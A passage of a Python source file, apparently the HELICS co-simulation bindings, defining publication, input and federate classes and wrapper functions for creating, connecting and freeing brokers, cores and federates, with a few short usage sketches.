The name is the local name if given; the key is the full key name.
"""
return helicsInputGetName(self)
@property
def units(self) -> str:
"""Get the units associated with a input."""
return helicsInputGetExtractionUnits(self)
@property
def injection_units(self) -> str:
"""Get the units associated with an inputs publication."""
return helicsInputGetInjectionUnits(self)
@property
def publication_type(self) -> str:
"""Get the units associated with a publication of an input."""
return helicsInputGetPublicationType(self)
@property
def type(self) -> str:
"""Get the type of the input."""
return helicsInputGetType(self)
@property
def target(self) -> str:
"""Get an associated target."""
return helicsSubscriptionGetTarget(self)
@property
def info(self) -> str:
"""Get the interface information field of the filter."""
return helicsInputGetInfo(self)
@info.setter
def info(self, info: str):
"""Set the interface information field of the publication."""
helicsInputSetInfo(self, info)
class HelicsPublication(_HelicsCHandle):
def __init__(self, handle):
super(HelicsPublication, self).__init__(handle, cleanup=False)
self.option = _PublicationOptionAccessor(self.handle, cleanup=False)
def __repr__(self):
name = self.name
type = self.type
info = self.info
units = self.units
return """<helics.{class_name}(name = "{name}", type = "{type}", units = "{units}", info = "{info}") at {id}>""".format(
class_name=self.__class__.__name__, name=name, type=type, units=units, info=info, id=hex(id(self))
)
def is_valid(self) -> bool:
"""Check if the publication is valid."""
return helicsPublicationIsValid(self)
def publish(self, data: Union[bytes, str, int, complex, float, List[float], Tuple[str, float], bool]):
"""
Publish a value on this publication.
The value may be raw bytes, a string, an integer, a double, a complex number, a list of doubles, a named point (tuple of string and double), or a boolean.
"""
if isinstance(data, bytes):
helicsPublicationPublishBytes(self, data)
elif isinstance(data, str):
helicsPublicationPublishString(self, data)
elif isinstance(data, bool):
# bool must be checked before int because bool is a subclass of int
helicsPublicationPublishBoolean(self, data)
elif isinstance(data, int):
helicsPublicationPublishInteger(self, data)
elif isinstance(data, float):
helicsPublicationPublishDouble(self, data)
elif isinstance(data, complex):
helicsPublicationPublishComplex(self, data.real, data.imag)
elif isinstance(data, list):
helicsPublicationPublishVector(self, data)
elif isinstance(data, tuple):
helicsPublicationPublishNamedPoint(self, data[0], data[1])
else:
raise NotImplementedError("Unknown type `{}`".format(type(data)))
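# Illustrative usage sketch (not part of the HELICS API): publishing values of
# different Python types through a single HelicsPublication. Assumes `pub` was
# obtained from HelicsValueFederate.register_publication; the values are arbitrary.
def _sketch_publish(pub):
    pub.publish(3.14159)  # double
    pub.publish(complex(1.0, -0.5))  # complex
    pub.publish([1.0, 2.0, 3.0])  # vector of doubles
    pub.publish(("setpoint", 42.0))  # named point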
@property
def key(self) -> str:
"""
Get the key for the publication.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use the `HelicsPublication.name` attribute instead.")
return helicsPublicationGetName(self)
@property
def name(self) -> str:
"""Get the key for the publication."""
return helicsPublicationGetName(self)
@property
def units(self) -> str:
"""Get the units of the publication."""
return helicsPublicationGetUnits(self)
@property
def type(self) -> str:
"""Get the type for the publication."""
return helicsPublicationGetType(self)
@property
def info(self) -> str:
"""Get the interface information field of the publication."""
return helicsPublicationGetInfo(self)
@info.setter
def info(self, info: str):
"""Set the interface information field of the publication."""
helicsPublicationSetInfo(self, info)
class HelicsValueFederate(HelicsFederate):
def __init__(self, handle):
super(HelicsValueFederate, self).__init__(handle)
for i in range(0, self.n_publications):
pub = self.get_publication_by_index(i)
self.publications[pub.name] = pub
for i in range(0, self.n_inputs):
sub = self.get_subscription_by_index(i)
self.subscriptions[sub.target] = sub
def register_publication(self, name: str, kind: Union[str, HelicsDataType], units: str = "") -> HelicsPublication:
"""
Register a publication.
Call is only valid in startup mode.
**Parameters**
- **`name`**: the name of the publication.
- **`kind`**: the type of the publication.
- **`units`**: a string defining the units of the publication [optional]
Returns: a publication id object for use as an identifier
"""
if type(kind) == str:
pub = helicsFederateRegisterTypePublication(self, name, kind, units)
else:
pub = helicsFederateRegisterPublication(self, name, HelicsDataType(kind), units)
self.publications[pub.name] = pub
return pub
def register_global_publication(self, name: str, kind: Union[str, HelicsDataType], units: str = "") -> HelicsPublication:
"""
Register a publication
Call is only valid in startup mode
**Parameters**
- **`name`**: the name of the publication
- **`kind`**: the type of the publication
- **`units`**: a string defining the units of the publication [optional]
Returns: a publication object for use as an identifier
"""
if type(kind) == str:
pub = helicsFederateRegisterGlobalTypePublication(self, name, kind, units)
else:
pub = helicsFederateRegisterGlobalPublication(self, name, HelicsDataType(kind), units)
self.publications[pub.name] = pub
return pub
def register_from_publication_json(self, data: Union[dict, str]):
"""
Register publications from a JSON output file or string.
Generates interface based on the data contained in a JSON file or string.
"""
if type(data) == str:
try:
with open(data) as f:
data = json.load(f)
except Exception:
data = json.loads(data)
else:
data = json.dumps(data)
helicsFederateRegisterFromPublicationJSON(self, data)
for i in range(0, self.n_publications):
pub = self.get_publication_by_index(i)
self.publications[pub.name] = pub
def get_publication_by_name(self, name: str) -> HelicsPublication:
"""Get publication by name."""
return helicsFederateGetPublication(self, name)
def get_publication_by_index(self, index: int) -> HelicsPublication:
"""
Get a publication by index.
**Parameters**
- **`index`**: a 0 based index of the publication to retrieve
Returns: a Publication object
"""
return helicsFederateGetPublicationByIndex(self, index)
def register_subscription(self, name: str, units: str = "") -> HelicsInput:
sub = helicsFederateRegisterSubscription(self, name, units)
self.subscriptions[sub.target] = sub
return sub
def register_input(self, name: str, kind: Union[str, HelicsDataType], units: str = "") -> HelicsInput:
"""
Register an input.
Call is only valid in startup mode.
**Parameters**
- **`name`**: the name of the input
- **`kind`**: the type of input to register
- **`units`**: a string defining the units of the input [optional]
Returns: an input id object for use as an identifier
"""
if type(kind) == str:
ipt = helicsFederateRegisterTypeInput(self, name, kind, units)
else:
ipt = helicsFederateRegisterInput(self, name, HelicsDataType(kind), units)
self.subscriptions[ipt.target] = ipt
return ipt
def register_global_input(self, name: str, kind: Union[str, HelicsDataType], units: str = "") -> HelicsInput:
"""
Register an input.
Call is only valid in startup mode.
**Parameters**
- **`name`**: the name of the input
- **`kind`**: a string defining the type of the input
- **`units`**: a string defining the units of the input [optional]
Returns: an input object for use as an identifier.
"""
if type(kind) == str:
ipt = helicsFederateRegisterGlobalTypeInput(self, name, kind, units)
else:
ipt = helicsFederateRegisterGlobalInput(self, name, HelicsDataType(kind), units)
self.subscriptions[ipt.target] = ipt
return ipt
def get_subscription_by_name(self, name: str) -> HelicsInput:
"""Get an input by index."""
return helicsFederateGetInput(self, name)
def get_subscription_by_index(self, index: int) -> HelicsInput:
"""Get a subscription by index."""
return helicsFederateGetInputByIndex(self, index)
@property
def n_subscriptions(self) -> int:
"""Get the number of inputs in this federate."""
return helicsFederateGetInputCount(self)
@property
def n_publications(self) -> int:
"""Get the number of publications in this federate."""
return helicsFederateGetPublicationCount(self)
def clear_updates(self):
"""Clear all the update flags from all federate inputs."""
helicsFederateClearUpdates(self)
def publish_json(self, data: Union[dict, str]):
"""Publish data contained in a JSON file."""
if type(data) == str:
try:
with open(data) as f:
data = json.load(f)
except Exception:
data = json.loads(data)
else:
data = json.dumps(data)
helicsFederatePublishJSON(self, data)
class HelicsMessageFederate(HelicsFederate):
def __init__(self, handle):
super(HelicsMessageFederate, self).__init__(handle)
for i in range(0, self.n_endpoints):
end = self.get_endpoint_by_index(i)
self.endpoints[end.name] = end
def register_endpoint(self, name: str, kind: str = "") -> HelicsEndpoint:
"""
Register an endpoint.
Call is only valid in startup mode
- **`name`**: the name of the endpoint
- **`kind`**: the defined type of the interface for endpoint checking if requested
Returns: an Endpoint Object
"""
ep = helicsFederateRegisterEndpoint(self, name, kind)
self.endpoints[ep.name] = ep
return ep
def register_global_endpoint(self, name: str, kind: str = "") -> HelicsEndpoint:
"""
Register an endpoint directly without prepending the federate name.
- **`name`**: the name of the endpoint
- **`kind`**: the defined type of the interface for endpoint checking if requested
Returns: an Endpoint Object
"""
ep = helicsFederateRegisterGlobalEndpoint(self, name, kind)
self.endpoints[ep.name] = ep
return ep
def get_endpoint_by_name(self, name: str) -> HelicsEndpoint:
"""
Get an Endpoint from its name.
**Parameters**
- **`name`**: the name of the endpoint to retrieve.
Returns: an Endpoint
"""
return helicsFederateGetEndpoint(self, name)
def get_endpoint_by_index(self, index: int) -> HelicsEndpoint:
"""
Get an Endpoint from an index.
**Parameters**
- **`index`**: the index of the endpoint to retrieve; the index is 0 based.
Returns: an Endpoint.
"""
return helicsFederateGetEndpointByIndex(self, index)
def has_message(self) -> bool:
"""Checks if federate has any messages."""
return helicsFederateHasMessage(self)
def get_message(self) -> HelicsMessage:
"""Get a packet for any endpoints in the federate."""
return helicsFederateGetMessage(self)
def create_message(self) -> HelicsMessage:
"""Create a message object."""
return helicsFederateCreateMessage(self)
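# Illustrative usage sketch (not part of the HELICS API): draining received
# messages on a message federate after a time grant. The endpoint name and the
# requested time are hypothetical; message contents depend on the other federates.
def _sketch_drain_messages(fed):
    ep = fed.register_endpoint("control")
    fed.enter_executing_mode()
    fed.request_time(1.0)
    received = []
    while fed.has_message():
        received.append(fed.get_message())
    return ep, received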
class HelicsCombinationFederate(HelicsValueFederate, HelicsMessageFederate):
pass
class HelicsException(Exception):
pass
def cstring(s: str) -> str:
# Convert python string to cstring
return ffi.new("char[]", s.encode())
def cdouble(d: float) -> float:
# Convert python float to cfloat
return d
def cchar(c: str) -> bytes:
# Convert python str to cchar
return c.encode()
def loadSym(s):
return getattr(lib, s)
def helicsGetVersion() -> str:
"""
Get a version string for HELICS.
"""
f = loadSym("helicsGetVersion")
result = f()
return ffi.string(result).decode()
def helicsGetSystemInfo() -> JSONType:
"""
Get a Python dictionary from JSON string containing version info.
The object contains fields with system information like cpu, core count, operating system, and memory,
as well as information about the HELICS build. Used for debugging reports and gathering other information.
"""
f = loadSym("helicsGetSystemInfo")
result = f()
return json.loads(ffi.string(result).decode())
def helicsGetBuildFlags() -> str:
"""
Get the build flags used to compile HELICS.
"""
f = loadSym("helicsGetBuildFlags")
result = f()
return ffi.string(result).decode()
def helicsGetCompilerVersion() -> str:
"""
Get the compiler version used to compile HELICS.
"""
f = loadSym("helicsGetCompilerVersion")
result = f()
return ffi.string(result).decode()
def helicsErrorInitialize():
"""
Return an initialized error object.
"""
f = loadSym("helicsErrorInitialize")
result = f()
if HELICS_VERSION == 2:
return ffi.new("helics_error *", result)
else:
return ffi.new("HelicsError *", result)
def helicsErrorClear(err: HelicsError):
"""
Clear an error object.
"""
f = loadSym("helicsErrorClear")
f(err)
def helicsIsCoreTypeAvailable(type: str) -> bool:
"""
Returns `True` if core/broker type specified is available in current compilation.
**Parameters**
- **`type`** - A string representing a core type. Options include "zmq", "udp", "ipc", "interprocess", "tcp", "default", "mpi".
**Returns**: `True` if `type` is available, `False` if `type` is not available.
"""
f = loadSym("helicsIsCoreTypeAvailable")
result = f(cstring(type))
return result == 1
def helicsCreateCore(type: str, name: str, init_string: str) -> HelicsCore:
"""
Create a `helics.HelicsCore`.
**Parameters**
- **`type`** - The type of the core to create.
- **`name`** - The name of the core. It can be a nullptr or empty string to have a name automatically assigned.
- **`init_string`** - An initialization string to send to the core. The format is similar to command line arguments. Typical options include a broker name, the broker address, the number of federates, etc.
**Returns**: `helics.HelicsCore`.
"""
f = loadSym("helicsCreateCore")
err = helicsErrorInitialize()
result = f(cstring(type), cstring(name), cstring(init_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCore(result)
def helicsCreateCoreFromArgs(type: str, name: str, arguments: List[str]) -> HelicsCore:
"""
Create a `helics.HelicsCore` by passing command line arguments.
**Parameters**
- **`type`** - The type of the core to create.
- **`name`** - The name of the core. It can be a nullptr or empty string to have a name automatically assigned.
- **`arguments`** - The list of string values from a command line.
**Returns**: `helics.HelicsCore`.
"""
f = loadSym("helicsCreateCoreFromArgs")
argc = len(arguments)
argv = ffi.new("char*[{argc}]".format(argc=argc))
for i, s in enumerate(arguments):
argv[i] = cstring(s)
err = helicsErrorInitialize()
result = f(cstring(type), cstring(name), argc, argv, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCore(result)
def helicsCoreClone(core: HelicsCore) -> HelicsCore:
"""
Create a new reference to an existing core.
This will create a new `helics.HelicsCore` that references the existing core.
The new `helics.HelicsCore` must be freed as well.
**Parameters**
- **`core`** - An existing `helics.HelicsCore`.
**Returns**: `helics.HelicsCore`.
"""
f = loadSym("helicsCoreClone")
err = helicsErrorInitialize()
result = f(core.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCore(result)
def helicsCoreIsValid(core: HelicsCore) -> bool:
"""
Check if a `helics.HelicsCore` is a valid object.
**Parameters**
- **`core`** - The `helics.HelicsCore` object to test.
**Returns**: `True` if valid, `False` if not valid.
"""
f = loadSym("helicsCoreIsValid")
result = f(core.handle)
return result == 1
def helicsCreateBroker(type: str, name: str = "", init_string: str = "") -> HelicsBroker:
"""
Create a broker object
**Parameters**
- **`type`** - The type of the broker to create.
- **`name`** - The name of the broker. It can be a nullptr or empty string to have a name automatically assigned.
- **`init_string`** - An initialization string to send to the core; the format is similar to command line arguments. Typical options include a broker address such as --broker="XSSAF" if this is a subbroker, or the number of federates, or the address.
**Returns**: `helics.HelicsBroker`.
"""
f = loadSym("helicsCreateBroker")
err = helicsErrorInitialize()
result = f(cstring(type), cstring(name), cstring(init_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsBroker(result)
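# Illustrative usage sketch (not part of the HELICS API): standing up a broker and
# a core for a two-federate run. The "zmq" core type and the init strings shown are
# typical choices, not the only valid ones.
def _sketch_broker_and_core():
    broker = helicsCreateBroker("zmq", "main_broker", "-f 2")
    core = helicsCreateCore("zmq", "main_core", "-f 2 --broker=main_broker")
    return broker, core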
def helicsCreateBrokerFromArgs(type: str, name: str, arguments: List[str]) -> HelicsBroker:
"""
Create a `helics.HelicsBroker` by passing command line arguments.
**Parameters**
- **`type`** - The type of the broker to create.
- **`name`** - The name of the broker. It can be a nullptr or empty string to have a name automatically assigned.
- **`arguments`** - The list of string values from a command line.
**Returns**: `helics.HelicsBroker`.
"""
f = loadSym("helicsCreateBrokerFromArgs")
argc = len(arguments)
argv = ffi.new("char*[{argc}]".format(argc=argc))
for i, s in enumerate(arguments):
argv[i] = cstring(s)
err = helicsErrorInitialize()
result = f(cstring(type), cstring(name), argc, argv, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsBroker(result)
def helicsBrokerClone(broker: HelicsBroker) -> HelicsBroker:
"""
Create a new reference to an existing broker.
This will create a new broker object that references the existing broker; it must be freed as well.
**Parameters**
- **`broker`** - An existing `helics.HelicsBroker`.
**Returns**: `helics.HelicsBroker`.
"""
f = loadSym("helicsBrokerClone")
err = helicsErrorInitialize()
result = f(broker.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsBroker(result)
def helicsBrokerIsValid(broker: HelicsBroker) -> bool:
"""
Check if a broker object is a valid object.
**Parameters**
- **`broker`** - The `helics.HelicsBroker` object to test.
**Returns**: `True` if valid, `False` if not valid.
"""
f = loadSym("helicsBrokerIsValid")
result = f(broker.handle)
return result == 1
def helicsBrokerIsConnected(broker: HelicsBroker) -> bool:
"""
Check if a broker is connected.
A connected broker implies it is attached to cores or cores could reach out to communicate.
**Returns**: `True` if connected, `False` if not connected.
"""
f = loadSym("helicsBrokerIsConnected")
result = f(broker.handle)
return result == 1
def helicsBrokerDataLink(broker: HelicsBroker, source_name: str, target_name: str):
"""
Link a named publication and named input using a broker.
**Parameters**
- **`broker`** - The broker to generate the connection from.
- **`source_name`** - The name of the publication.
- **`target_name`** - The name of the target to send the publication data.
"""
f = loadSym("helicsBrokerDataLink")
err = helicsErrorInitialize()
f(broker.handle, cstring(source_name), cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerAddSourceFilterToEndpoint(broker: HelicsBroker, filter_name: str, endpoint_name: str):
"""
Link a named filter to a source endpoint.
**Parameters**
- **`broker`** - The broker to generate the connection from.
- **`filter`** - The name of the filter.
- **`endpoint`** - The name of the endpoint to filter the data from.
"""
f = loadSym("helicsBrokerAddSourceFilterToEndpoint")
err = helicsErrorInitialize()
f(broker.handle, cstring(filter_name), cstring(endpoint_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerAddDestinationFilterToEndpoint(broker: HelicsBroker, filter_name: str, endpoint_name: str):
"""
Link a named filter to a destination endpoint.
**Parameters**
- **`broker`** - The broker to generate the connection from.
- **`filter`** - The name of the filter.
- **`endpoint`** - The name of the endpoint to filter the data going to.
"""
f = loadSym("helicsBrokerAddDestinationFilterToEndpoint")
err = helicsErrorInitialize()
f(broker.handle, cstring(filter_name), cstring(endpoint_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerMakeConnections(broker: HelicsBroker, file: str):
"""
Load a file containing connection information.
**Parameters**
- **`broker`** - The broker to generate the connections from.
- **`file`** - A JSON or TOML file containing connection information.
"""
f = loadSym("helicsBrokerMakeConnections")
err = helicsErrorInitialize()
f(broker.handle, cstring(file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreWaitForDisconnect(core: HelicsCore, ms_to_wait: int) -> bool:
"""
Wait for the core to disconnect.
**Parameters**
- **`core`** - The core to wait for.
- **`ms_to_wait`** - The timeout in milliseconds (<0 for infinite timeout).
**Returns**: `True` if the disconnect was acknowledged, `False` if the timeout expired.
"""
f = loadSym("helicsCoreWaitForDisconnect")
err = helicsErrorInitialize()
result = f(core.handle, ms_to_wait, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsBrokerWaitForDisconnect(broker: HelicsBroker, ms_to_wait: int) -> bool:
"""
Wait for the broker to disconnect.
**Parameters**
- **`broker`** - The broker to wait for.
- **`ms_to_wait`** - The timeout in milliseconds (<0 for infinite timeout).
**Returns**: `True` if the disconnect was acknowledged, `False` if the timeout expired.
"""
f = loadSym("helicsBrokerWaitForDisconnect")
err = helicsErrorInitialize()
result = f(broker.handle, ms_to_wait, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsCoreIsConnected(core: HelicsCore) -> bool:
"""
Check if a core is connected.
A connected core implies it is attached to federates or federates could be attached to it.
**Returns**: `True` if connected, `False` if not connected.
"""
f = loadSym("helicsCoreIsConnected")
result = f(core.handle)
return result == 1
def helicsCoreDataLink(core: HelicsCore, source_name: str, target_name: str):
"""
Link a named publication and named input using a core.
**Parameters**
- **`core`** - The core to generate the connection from.
- **`source_name`** - The name of the publication.
- **`target_name`** - The name of the target to send the publication data.
"""
f = loadSym("helicsCoreDataLink")
err = helicsErrorInitialize()
f(core.handle, cstring(source_name), cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreAddSourceFilterToEndpoint(core: HelicsCore, filter_name: str, endpoint_name: str):
"""
Link a named filter to a source endpoint.
**Parameters**
- **`core`** - The core to generate the connection from.
- **`filter`** - The name of the filter.
- **`endpoint`** - The name of the endpoint to filter the data from.
"""
f = loadSym("helicsCoreAddSourceFilterToEndpoint")
err = helicsErrorInitialize()
f(core.handle, cstring(filter_name), cstring(endpoint_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreAddDestinationFilterToEndpoint(core: HelicsCore, filter_name: str, endpoint_name: str):
"""
Link a named filter to a destination endpoint.
**Parameters**
- **`core`** - The core to generate the connection from.
- **`filter`** - The name of the filter.
- **`endpoint`** - The name of the endpoint to filter the data going to.
"""
f = loadSym("helicsCoreAddDestinationFilterToEndpoint")
err = helicsErrorInitialize()
f(core.handle, cstring(filter_name), cstring(endpoint_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreMakeConnections(core: HelicsCore, file: str):
"""
Load a file containing connection information.
**Parameters**
- **`core`** - The core to generate the connections from.
- **`file`** - A JSON or TOML file containing connection information.
"""
f = loadSym("helicsCoreMakeConnections")
err = helicsErrorInitialize()
f(core.handle, cstring(file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerGetIdentifier(broker: HelicsBroker) -> str:
"""
Get an identifier for the broker.
**Parameters**
- **`broker`** - The broker to query.
**Returns**: A string containing the identifier for the broker.
"""
f = loadSym("helicsBrokerGetIdentifier")
result = f(broker.handle)
return ffi.string(result).decode()
def helicsCoreGetIdentifier(core: HelicsCore) -> str:
"""
Get an identifier for the core.
**Parameters**
- **`core`** - The core to query.
**Returns**: A string with the identifier of the core.
"""
f = loadSym("helicsCoreGetIdentifier")
result = f(core.handle)
return ffi.string(result).decode()
def helicsBrokerGetAddress(broker: HelicsBroker) -> str:
"""
Get the network address associated with a broker.
**Parameters**
- **`broker`** - The broker to query.
**Returns**: A string with the network address of the broker.
"""
f = loadSym("helicsBrokerGetAddress")
result = f(broker.handle)
return ffi.string(result).decode()
def helicsCoreGetAddress(core: HelicsCore) -> str:
"""
Get the network address associated with a core.
**Parameters**
- **`core`** - The core to query.
**Returns**: A string with the network address of the broker.
"""
f = loadSym("helicsCoreGetAddress")
result = f(core.handle)
return ffi.string(result).decode()
def helicsCoreSetReadyToInit(core: HelicsCore):
"""
Set the core to ready for init.
This function is used for cores that have filters but no federates so there needs to be a direct signal to the core to trigger the federation initialization.
**Parameters**
- **`core`** - The `helics.HelicsCore` to enable init values for.
"""
f = loadSym("helicsCoreSetReadyToInit")
err = helicsErrorInitialize()
f(core.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreConnect(core: HelicsCore) -> bool:
"""
Connect a core to the federate based on current configuration.
**Parameters**
- **`core`** - The core to connect.
**Returns**: `True` if `core` is connected successfully, else `False`.
"""
f = loadSym("helicsCoreConnect")
err = helicsErrorInitialize()
result = f(core.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsCoreDisconnect(core: HelicsCore):
"""
Disconnect a core from the federation.
**Parameters**
- **`core`** - The core to query.
"""
f = loadSym("helicsCoreDisconnect")
err = helicsErrorInitialize()
f(core.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsGetFederateByName(fed_name: str) -> HelicsFederate:
"""
Get an existing `helics.HelicsFederate` from a core by name.
The federate must have been created by one of the other functions and at least one of the objects referencing the created federate must still be active in the process.
**Parameters**
- **`fed_name`** - The name of the federate to retrieve.
**Returns**: `helics.HelicsFederate`.
"""
f = loadSym("helicsGetFederateByName")
err = helicsErrorInitialize()
result = f(cstring(fed_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFederate(result)
def helicsBrokerDisconnect(broker: HelicsBroker):
"""
Disconnect a broker.
**Parameters**
- **`broker`** - The broker to disconnect.
"""
f = loadSym("helicsBrokerDisconnect")
err = helicsErrorInitialize()
f(broker.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateDestroy(fed: HelicsFederate):
"""
Disconnect and free a federate.
"""
f = loadSym("helicsFederateDestroy")
f(fed.handle)
def helicsBrokerDestroy(broker: HelicsBroker):
"""
Disconnect and free a broker.
"""
f = loadSym("helicsBrokerDestroy")
f(broker.handle)
def helicsCoreDestroy(core: HelicsCore):
"""
Disconnect and free a core.
"""
f = loadSym("helicsCoreDestroy")
f(core.handle)
def helicsCoreFree(core: HelicsCore):
"""
Release the memory associated with a core.
"""
f = loadSym("helicsCoreFree")
f(core.handle)
def helicsBrokerFree(broker: HelicsBroker):
"""
Release the memory associated with a broker.
"""
f = loadSym("helicsBrokerFree")
f(broker.handle)
def helicsCreateValueFederate(fed_name: str, fi: HelicsFederateInfo = None) -> HelicsValueFederate:
"""
Creation and destruction of Federates.
Create `helics.HelicsValueFederate` from `helics.HelicsFederateInfo`.
`helics.HelicsValueFederate` objects can be used in all functions that take a `helics.HelicsFederate` as an argument.
**Parameters**
- **`fed_name`** - The name of the federate to create; can be NULL or an empty string to use the default name from fi or an assigned name.
- **`fi`** - The federate info object that contains details on the federate.
**Returns**: `helics.HelicsValueFederate`.
"""
f = loadSym("helicsCreateValueFederate")
err = helicsErrorInitialize()
if fi is None:
fi = helicsCreateFederateInfo()
result = f(cstring(fed_name), fi.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsValueFederate(result)
def helicsCreateValueFederateFromConfig(config_file: str) -> HelicsValueFederate:
"""
Create `helics.HelicsValueFederate` from a JSON file, JSON string, or TOML file.
`helics.HelicsValueFederate` objects can be used in all functions that take a `helics.HelicsFederate` as an argument.
**Parameters**
- **`config_file`** - A JSON file or a JSON string or TOML file that contains setup and configuration information.
**Returns**: `helics.HelicsValueFederate`.
"""
f = loadSym("helicsCreateValueFederateFromConfig")
err = helicsErrorInitialize()
result = f(cstring(config_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsValueFederate(result)
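# Illustrative usage sketch (not part of the HELICS API): building a value federate
# from a JSON configuration file. "federate_config.json" is a hypothetical path; the
# file would define the federate name, core type, and publications/subscriptions.
def _sketch_federate_from_config():
    fed = helicsCreateValueFederateFromConfig("federate_config.json")
    fed.enter_executing_mode()
    return fed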
def helicsCreateMessageFederate(fed_name: str, fi: HelicsFederateInfo = None) -> HelicsMessageFederate:
"""
Create `helics.HelicsMessageFederate` from `helics.HelicsFederateInfo`.
`helics.HelicsMessageFederate` objects can be used in all functions that take a `helics.HelicsFederate` as an argument.
**Parameters**
- **`fed_name`** - The name of the federate to create.
- **`fi`** - The federate info object that contains details on the federate.
**Returns**: `helics.HelicsMessageFederate`.
"""
f = loadSym("helicsCreateMessageFederate")
err = helicsErrorInitialize()
if fi is None:
fi = helicsCreateFederateInfo()
result = f(cstring(fed_name), fi.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsMessageFederate(result)
def helicsCreateMessageFederateFromConfig(config_file: str) -> HelicsMessageFederate:
"""
Create `helics.HelicsMessageFederate` from a JSON file or JSON string or TOML file.
`helics.HelicsMessageFederate` objects can be used in all functions that take a `helics.HelicsFederate` object as an argument.
**Parameters**
- **`config_file`** - A config (JSON,TOML) file or a JSON string that contains setup and configuration information.
**Returns**: `helics.HelicsMessageFederate`.
"""
f = loadSym("helicsCreateMessageFederateFromConfig")
err = helicsErrorInitialize()
result = f(cstring(config_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsMessageFederate(result)
def helicsCreateCombinationFederate(fed_name: str, fi: HelicsFederateInfo = None) -> HelicsCombinationFederate:
"""
Create a combination federate from `helics.HelicsFederateInfo`.
Combination federates are both value federates and message federates; objects of this type can be used in all functions
that take a `helics.HelicsFederate` object as an argument.
**Parameters**
- **`fed_name`** - A string with the name of the federate, can be NULL or an empty string to pull the default name from fi.
- **`fi`** - The federate info object that contains details on the federate.
**Returns**: `helics.HelicsCombinationFederate`.
"""
f = loadSym("helicsCreateCombinationFederate")
err = helicsErrorInitialize()
if fi is None:
fi = helicsCreateFederateInfo()
result = f(cstring(fed_name), fi.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCombinationFederate(result)
def helicsCreateCombinationFederateFromConfig(config_file: str) -> HelicsCombinationFederate:
"""
Create a combination federate from a JSON file or JSON string or TOML file.
Combination federates are both value federates and message federates; objects of this type can be used in all functions
that take a `helics.HelicsFederate` object as an argument.
**Parameters**
- **`config_file`** - A JSON file or a JSON string or TOML file that contains setup and configuration information.
**Returns**: `helics.HelicsCombinationFederate`.
"""
f = loadSym("helicsCreateCombinationFederateFromConfig")
err = helicsErrorInitialize()
result = f(cstring(config_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCombinationFederate(result)
def helicsFederateClone(fed: HelicsFederate) -> HelicsFederate:
"""
Create a new reference to an existing federate.
This will create a new `helics.HelicsFederate` object that references the existing federate.
The new object must be freed as well.
**Parameters**
- **`fed`** - An existing `helics.HelicsFederate`.
**Returns**: `helics.HelicsFederate`.
"""
f = loadSym("helicsFederateClone")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFederate(result)
def helicsCreateFederateInfo() -> HelicsFederateInfo:
"""
Create `helics.HelicsFederateInfo` for specifying federate information when constructing a federate.
**Returns**: `helics.HelicsFederateInfo`.
"""
f = loadSym("helicsCreateFederateInfo")
result = f()
return HelicsFederateInfo(result)
def helicsFederateInfoClone(fi: HelicsFederateInfo) -> HelicsFederateInfo:
"""
Create `helics.HelicsFederateInfo` from an existing one and clone the information.
**Parameters**
- **`fi`** - A federateInfo object to duplicate.
**Returns**: `helics.HelicsFederateInfo`.
"""
f = loadSym("helicsFederateInfoClone")
